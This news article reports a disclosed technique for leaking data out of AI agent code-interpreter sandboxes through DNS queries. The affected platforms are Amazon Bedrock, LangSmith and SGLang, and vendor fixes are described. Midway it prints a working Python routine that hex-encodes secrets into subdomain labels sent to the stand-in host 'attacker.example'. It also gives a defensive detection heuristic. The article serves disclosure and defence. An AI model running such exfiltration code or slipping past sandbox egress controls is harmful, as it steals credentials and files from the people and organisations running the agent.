Cybersecurity researchers disclosed on Monday a new method for exfiltrating sensitive data from artificial intelligence code execution environments. The technique exploits outbound domain name system, or DNS, queries to bypass security controls in platforms including Amazon Bedrock and LangSmith.
The findings, detailed in a report by security firm BeyondTrust, highlight a critical vulnerability in the sandboxed interpreters used by AI agents. These interpreters allow AI models to execute code, but the discovered flaw permits unauthorized data exfiltration and can lead to remote code execution, or RCE.
Core Vulnerability in Sandboxed Interpreters
According to the report, the Code Interpreter used by Amazon Bedrock Agents incorrectly permits outbound DNS queries even when running in its sandboxed mode. An attacker can craft malicious code that forces the AI agent to perform DNS lookups containing encoded sensitive data. Those lookups are routed to a domain controlled by the attacker, effectively stealing the data from the secured environment.
The vulnerability is not isolated to a single provider. Researchers demonstrated similar data exfiltration techniques against LangChain’s LangSmith platform and the SGLang server. These platforms are widely used by developers to build, debug, and deploy applications powered by large language models, or LLMs.
Mechanism of the Attack
The attack exploits a fundamental trust in sandbox security. While these environments typically restrict network access to prevent data leaks, they often allow DNS queries for legitimate functionality, such as connecting to APIs. Attackers can hijack this mechanism.
By embedding stolen information, such as API keys or file contents, into the subdomain labels of a DNS query, an attacker causes the data to be delivered to a name server under their control. The attacker then decodes the information from the name server's query logs. In more severe cases, this channel can be used to establish a reverse shell, granting full remote control over the compromised environment.
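The encoding step described above can be sketched in a few lines of Python. This is an illustrative reconstruction of the general DNS covert-channel technique, not the researchers' actual proof-of-concept; the domain `attacker.example` and all function names are hypothetical.

```python
import binascii
import socket

MAX_LABEL = 63  # DNS limits each label to 63 bytes (RFC 1035)

def encode_for_dns(secret: bytes, domain: str = "attacker.example") -> list[str]:
    """Hex-encode a secret and split it into DNS-safe subdomain labels."""
    hexed = binascii.hexlify(secret).decode("ascii")
    chunks = [hexed[i:i + MAX_LABEL] for i in range(0, len(hexed), MAX_LABEL)]
    # Each query name carries one chunk plus a sequence number so the
    # attacker can reassemble the data from their name server's logs.
    return [f"{i}.{chunk}.{domain}" for i, chunk in enumerate(chunks)]

def exfiltrate(secret: bytes) -> None:
    for name in encode_for_dns(secret):
        try:
            # The lookup itself leaks the data: the query reaches the
            # attacker's authoritative name server even if resolution fails.
            socket.gethostbyname(name)
        except socket.gaierror:
            pass  # NXDOMAIN is expected; the data has already left
```

Because the payload travels in the query name rather than in a connection, no TCP session to the attacker is ever opened, which is why conventional egress firewalls that permit DNS do not notice the transfer.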
Widespread Impact on AI Development
The affected platforms are integral to the current AI application ecosystem. Amazon Bedrock is a fully managed service offering foundation models from various AI companies. LangSmith provides a suite of tools for tracing, testing, and monitoring LLM applications. SGLang is a runtime engine designed for efficient execution of LLMs.
The vulnerability means that any organization using these tools for AI development could be at risk. Sensitive data processed by AI agents, including proprietary code, internal documents, and credentials, could be silently stolen without triggering traditional network security alarms.
Vendor Responses and Mitigations
Following responsible disclosure by BeyondTrust, the involved vendors have taken steps to address the issues. Amazon Web Services updated the Bedrock Code Interpreter to block outbound DNS resolution by default. LangChain implemented validation to reject prompts containing suspicious DNS patterns.
Security experts recommend that users of these platforms apply all available updates immediately. They also advise implementing additional layers of network monitoring specifically for unusual DNS query patterns originating from AI development and runtime environments.
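Monitoring for this class of attack typically means flagging query names with unusually long, random-looking labels. The heuristic below is a minimal sketch under assumed thresholds (a 30-character label limit and a Shannon-entropy cutoff of 3.5 bits), not a vendor-provided detection rule; real deployments would tune both values against baseline traffic.

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Shannon entropy in bits per character of a string."""
    counts = Counter(s)
    total = len(s)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

def looks_like_exfiltration(qname: str,
                            max_label_len: int = 30,
                            entropy_threshold: float = 3.5) -> bool:
    """Flag query names whose labels are both long and random-looking,
    a common signature of encoded data in a DNS covert channel."""
    for label in qname.rstrip(".").split("."):
        if len(label) > max_label_len and shannon_entropy(label) > entropy_threshold:
            return True
    return False
```

A legitimate name such as `api.us-east-1.amazonaws.com` passes, while a query carrying a long hex-encoded payload in one label trips both conditions. Entropy alone is not sufficient, since content-hash subdomains used by CDNs can also score high; correlating flagged queries with their source (an AI code-execution environment) reduces false positives.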
Broader Security Implications for AI
This incident underscores the evolving security challenges presented by generative AI and agentic systems. As AI models gain the ability to perform actions and execute code, the attack surface expands significantly. Traditional application security models must be adapted to account for these new, AI-specific threat vectors.
The research indicates that the assumption of safety within a code interpreter sandbox is dangerously misplaced unless all network egress points, including DNS, are rigorously controlled. It calls for applying a principle of least privilege to AI agents, similar to that applied in conventional IT security.
Further analysis and security audits of other AI agent platforms and code execution environments are expected in the cybersecurity community. Industry groups are likely to develop new best practice frameworks for securing AI development tools against data exfiltration and supply chain attacks.
Source: BeyondTrust